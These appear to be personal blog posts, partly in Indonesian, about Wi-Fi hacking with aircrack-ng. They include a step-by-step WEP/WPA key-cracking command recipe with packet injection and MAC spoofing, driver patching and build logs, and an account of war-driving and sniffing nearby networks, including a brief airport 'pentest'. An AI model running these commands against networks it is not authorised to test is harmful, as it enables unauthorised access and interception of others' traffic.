WEP cracking formula

Berikut ini adalah salah satu oleh-oleh dari medan (hari minggu semalam kemarin :)), aku memang tidak lagi bisa menghapal rumus/formula yang panjang, dan aku juga merasa tidak perlu. Jadi untuk mempermudah melakukan Demo WEP cracking di setiap seminar (sebenarnya baru terpikir untuk membuatnya sewaktu di medan kemarin) aku membuat formula ini, dan mudah-mudahan bermanfaat buat semuanya :)

Terima kasih buat STMIK Potensi Utama atas semua kesempatan, dan kegembiraan yang diberikan kepada aku dan dedi, terima kasih khususnya buat Pak Bob, abdi, yudi, bang asbon dan bang bujang atas semuanya selama kami disana, dan untuk para peserta workshop linux security (materi dedi:windows 2003 server security) & Seminar wifi security (materi dedi: web hacking kungfu) yang terlihat lebih "antusias" dari pemateri, sukses terus yah :)

Baiklah, inilah formulanya (rangkuman dari www.aircrack-ng.org)

WEP Cracking Formula

Need info:
Access Point
eSSID= (A)
bssid/mac address= (B)
channel= (C)
security= (D)

Attacker interface
madwifi iface= (X)
mac address= (Y)
iface = (Z)

FARMING the KEY
airmon-ng stop (X)
airmon-ng (Z) start (C)
airodump-ng --bssid (B) -c (C) -w namafile (X)
aireplay-ng -1 6000 -o 1 -q 10 -e (A) -a (B) -h (Y) (X)
aireplay-ng --arpreplay -b (B) -h (Y) -x 600 (X)

CRACKING the KEY
aircrack-ng -z -b (B) namafile-*.cap (WEP/ptw style)
aircrack-ng -w -b (B) namafile-*.cap (WPA/dictionary style)

CHANGE MAC
#ifconfig (X) hw ether (NEW MAC)

Enjoy(tm)
images are taken from http://lisa.jpl.nasa.gov

Gentoo madwifi ad-hoc

Need too figure out, when the AP`s is gone (lol), actually i just borrow it, and the time limit is finish. So, to connect my ipod touch (ex1a) to internet theres only one way(in iPhone u can use GPRS), using Wifi Ad-Hoc connection sharing with my laptop. Hmm.. let see (simple ICS)

iPod Touch (wifi) -----> (ath0:madwifi)laptop(eth0) ----->inet

like a pain in the a**, when u try to iwconfig [dev] mode Ad-Hoc and it didnt work at all, yeah.. madwifi support wlanconfig, so create some VAP for it. short Instruction .. below

~ # wlanconfig ath0 destroy
~ # wlanconfig ath0 create wlandev wifi0 wlanmode adhoc
~ # iwconfig ath0 essid venom channel 2
u can set ENC key for WEP or WPA
~ # ifconfig ath0 192.168.0.52 netmask 255.255.255.0
~ # echo "1" > /proc/sys/net/ipv4/ip_forward

Open your ipod touch wifi configuration, and set the essid to venom, put a static IP (set laptop ath0 as the gateway, dont forget to set DNS also).

If u need to combine it with dhcp (for your wifi client),

iPod Touch (wifi:dhcp-client) -----> (ath0:madwifi:dhcp-server)laptop(eth0) ----->inet

just install dnsmasq package, so..

~# emerge dnsmasq
~# vi /etc/dnsmasq.conf
Add this line to enable dhcp:
dhcp-range=192.168.0.50,192.168.0.150,12h
Restrict dnsmasq to just the LAN interface
interface=ath0
~# rc-update add dnsmasq default
~# /etc/init.d/dnsmasq start

Its not only for Gentoo, but for General usage of madwifi.
hope it help(nothing special), have phun!

Installing madwifi-ng (plus aircrack-ng patch)

Before you playin with aircrack-ng so you have to patched your driver (in this case madwifi for my Atheros, u can check patched for your driver here) for injection

y3dips@tarantula:~$ svn checkout http://svn.madwifi.org/trunk/ madwifi-ng
y3dips@tarantula:~$ wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
y3dips@tarantula:~$ cd madwifi-ng/
y3dips@tarantula:~/madwifi-ng$ patch -Np1 -i ../madwifi-ng-r2277.patch
patching file ath/if_ath.c
y3dips@tarantula:~/madwifi-ng$ sudo make
Checking requirements... ok.
Checking kernel configuration... ok.
...{process truncated}
y3dips@tarantula:~/madwifi-ng$ sudo make install
sh scripts/find-madwifi-modules.sh 2.6.17-10-generic

WARNING:
It seems that there are modules left from previous MadWifi installations.
If you are unistalling the MadWifi modules please press "r" to remove them.
If you are installing new MadWifi modules, you should consider removing those
already installed, or else you may experience problems during operation.
Remove old modules?

[l]ist, [r]emove, [i]gnore or e[x]it (l,r,i,[x]) ?
r
... {process truncated}
y3dips@tarantula:~/madwifi-ng$ sudo depmod -ae
y3dips@tarantula:~/madwifi-ng$ sudo modprobe ath_pci
y3dips@tarantula:~/madwifi-ng$ iwconfig ath0
ath0 IEEE 802.11b ESSID:""
Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:0 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

then u can start your wifi hack

y3dips@tarantula:~$ sudo airmon-ng stop ath0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

y3dips@tarantula:~$

Happy hacking :)

Installing Aircrack-ng

An easy way to install aircrack-ng (aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.) and get the newest version.

y3dips@tarantula:~$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
A aircrack-ng/airoscript
A aircrack-ng/airoscript/LICENSE
A aircrack-ng/airoscript/AUTHORS
A aircrack-ng/airoscript/CHANGELOG
A aircrack-ng/airoscript/airoscript.sh
A aircrack-ng/airoscript/README
A aircrack-ng/test
A aircrack-ng/test/makeivs.c
A aircrack-ng/test/password.lst
A aircrack-ng/test/wep.shared.key.authentication.cap
A aircrack-ng/test/wpa.cap
A aircrack-ng/test/wpa2.eapol.cap
A aircrack-ng/test/wep.open.system.authentication.cap
A aircrack-ng/LICENSE
A aircrack-ng/VERSION
A aircrack-ng/Makefile.osx
A aircrack-ng/AUTHORS
A aircrack-ng/airmon-ng
A aircrack-ng/ChangeLog
A aircrack-ng/patches
A aircrack-ng/patches/zd1211rw_inject_2.6.17.patch
A aircrack-ng/patches/madwifi-ng-r2277.patch
A aircrack-ng/patches/linux-wlan-0.2.5.packet.injection.patch
A aircrack-ng/patches/hostap-kernel-2.6.18.patch
A aircrack-ng/patches/rtl8187_2.6.20v2.patch
A aircrack-ng/patches/madwifi-old-r1417.patch
A aircrack-ng/patches/prism54-svn-20050724.patch
A aircrack-ng/patches/rtl8180-0.21v2.patch
A aircrack-ng/patches/hostap-driver-0.4.7.patch
A aircrack-ng/patches/ipw2200-1.1.4-inject.patch
A aircrack-ng/patches/zd1211rw_inject_2.6.20.patch
A aircrack-ng/patches/ieee80211_inject.patch
A aircrack-ng/patches/old
A aircrack-ng/patches/old/zd1211rw_malformed.patch
A aircrack-ng/patches/old/rtl8187_1010.0622.patch
A aircrack-ng/patches/old/madwifi-ng-r1475_disable_retry_raw.patch
A aircrack-ng/patches/old/linux-wlan-0.2.3.packet.injection.patch
A aircrack-ng/patches/old/rt2500-cvs-20051008-prismheader.patch
A aircrack-ng/patches/old/rt2500-cvs-2005112305.patch
A aircrack-ng/patches/old/rt2500-cvs-20050724.patch
A aircrack-ng/patches/old/madwifi-ng-r1520.patch
A aircrack-ng/patches/old/hostap-driver-0.4.5.patch
A aircrack-ng/patches/old/rt2570-cvs-20051008-prismheader.patch
A aircrack-ng/patches/old/rtl8187_1010.0622v2.patch
A aircrack-ng/patches/old/hostap-driver-0.3.9.patch
A aircrack-ng/patches/old/madwifi-ng-r1730.patch
A aircrack-ng/patches/old/rt2570-cvs-2005112305.patch
A aircrack-ng/patches/old/madwifi-ng-r1713.patch
A aircrack-ng/patches/old/rt2570-cvs-20050824.patch
A aircrack-ng/patches/old/rtl8187_2.6.20.patch
A aircrack-ng/patches/old/madwifi-ng-r1526.patch
A aircrack-ng/patches/old/madwifi-ng-r1545.patch
A aircrack-ng/patches/old/rtl8180-0.21.patch
A aircrack-ng/patches/old/madwifi-ng-r1486.patch
A aircrack-ng/patches/old/hostap-kernel-2.6.16.patch
A aircrack-ng/patches/old/madwifi-cvs-20051025.patch
A aircrack-ng/patches/old/madwifi-ng-r1983.patch
A aircrack-ng/patches/old/madwifi-ng-r1679.patch
A aircrack-ng/patches/old/madwifi-ng-r1886.patch
A aircrack-ng/patches/old/madwifi-cvs-20050814.patch
A aircrack-ng/patches/old/madwifi-cvs-20050707.patch
A aircrack-ng/patches/old/ipw2200-1.1.3-inject.patch
A aircrack-ng/patches/old/wlanng-0.2.1-pre26.patch
A aircrack-ng/patches/old/madwifi-ng-r1457-1473_disable_retry_raw.patch
A aircrack-ng/src
A aircrack-ng/src/airtun-ng.c
A aircrack-ng/src/uniqueiv.c
A aircrack-ng/src/crc.c
A aircrack-ng/src/aireplay-ng.c
A aircrack-ng/src/kstats.c
A aircrack-ng/src/airdecap-ng.c
A aircrack-ng/src/sha1-mmx.S
A aircrack-ng/src/crypto.c
A aircrack-ng/src/aircrack-ng.c
A aircrack-ng/src/ivstools.c
A aircrack-ng/src/airodump-ng.c
A aircrack-ng/src/crctable.h
A aircrack-ng/src/crypto.h
A aircrack-ng/src/pcap.h
A aircrack-ng/src/common.c
A aircrack-ng/src/version.h
A aircrack-ng/src/packetforge-ng.c
A aircrack-ng/manpages
A aircrack-ng/manpages/aircrack-ng.1
A aircrack-ng/manpages/airodump-ng.1
A aircrack-ng/manpages/ivstools.1
A aircrack-ng/manpages/airtun-ng.1
A aircrack-ng/manpages/airmon-ng.1
A aircrack-ng/manpages/aireplay-ng.1
A aircrack-ng/manpages/kstats.1
A aircrack-ng/manpages/airdecap-ng.1
A aircrack-ng/manpages/packetforge-ng.1
A aircrack-ng/manpages/makeivs.1
A aircrack-ng/Makefile.NetBSD
A aircrack-ng/README
A aircrack-ng/Makefile.other
A aircrack-ng/evalrev
A aircrack-ng/INSTALLING
A aircrack-ng/Makefile.OpenBSD
A aircrack-ng/Makefile.cygwin
A aircrack-ng/Makefile
A aircrack-ng/packages
A aircrack-ng/packages/PKGBUILD
A aircrack-ng/packages/slack-desc
A aircrack-ng/packages/aircrack-ng.spec
Checked out revision 297.

y3dips@tarantula:~/aircrack-ng$ make
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/aircrack-ng.c src/crypto.c src/sha1-mmx.S src/common.c -o aircrack-ng -lpthread
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/airdecap-ng.c src/crypto.c src/common.c src/crc.c -o airdecap-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/packetforge-ng.c src/common.c src/crc.c -o packetforge-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/ivstools.c src/common.c -o ivstools
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/kstats.c -o kstats
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` test/makeivs.c -o makeivs
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/aireplay-ng.c src/common.c src/crc.c -o aireplay-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/airodump-ng.c src/common.c -o airodump-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/airtun-ng.c src/common.c src/crc.c src/crypto.c -o airtun-ng

y3dips@tarantula:~/aircrack-ng$ sudo make install
Password:
install -d /usr/local/bin
install -m 755 aircrack-ng airdecap-ng packetforge-ng ivstools kstats /usr/local/bin
install -m 755 makeivs /usr/local/bin
install -d /usr/local/man/man1
install -m 644 ./manpages/* /usr/local/man/man1
install -d /usr/local/sbin
install -m 755 aireplay-ng airodump-ng airtun-ng /usr/local/sbin
install -m 755 airmon-ng /usr/local/sbin

y3dips@tarantula:~/aircrack-ng$ aircrack-ng

Aircrack-ng 0.7 r297 - (C) 2006,2007 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:

-a : force attack mode (1/WEP, 2/WPA-PSK)
-e : target selection: network identifier
-b : target selection: access point's MAC
-q : enable quiet mode (no status output)

Static WEP cracking options:

-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-h : search the numeric key for Fritz!BOX
-d : debug - specify mask of the key (A1:XX:CF:YY)
-m : MAC address to filter usable packets
-n : WEP key length : 64/128/152/256/512
-i : WEP key index (1 to 4), default: any
-f : bruteforce fudge factor, default: 2
-k : disable one attack method (1 to 17)
-x or -x0 : disable last keybytes bruteforce
-x1 : enable last keybyte bruteforcing (default)
-x2 : enable last two keybytes bruteforcing
-y : experimental single bruteforce mode
-s : show ASCII version of the key

WEP and WPA-PSK cracking options:

-w : path to a dictionary file (multiple
dictionnaries can be specified.
See manpage for more information)

--help : Displays this usage screen

No file to crack specified.

Happy "wifi hacking" then ..

Airport 100307

-The explanation o f a picture will follow As Soon As Possible :), my pentest within a short time (15.47 - 16.32 WIB) at an Airport ... (educational purposes only) -

Im so sorry, for some reason, i have to close this article ..
mwuach .. see you guyz

Lurking around; Unmotivied

As its writen in the title, there is no motivation for me to do such "war driving" (since im doing it by huddle-up, i think fair enough if it says "war huddle-up" :lol:) this time, except for doing Access Poit (APs) survey, checking the security levels, also knowing the distance from my place to the APs and trully i found many interesting part in my activity, I also have to to use "wireshark" (new version of ethereal) for "unmotivy" reasons.. (like ive been under intimidating with guns :P)

According to "war huddle-up" time, ive found that some APs are hiding their SSIDs, which is mean they are aware about security, One APs using "WEP" for encryotion (sorry, i dont crack the key for some purpose, actually im afraid that im goin too far :P ), at last enjoy the skrinsyut



netstumbler specifically let us knowing the signal strength (or we may say it a distance)



kismet pushing the devices into monitor mode (make your work easier if u dont know how to set iwconfig [dev] mode monitor :P, so u can match it with sniffing tools )


then, just harvest the traffic.

FIN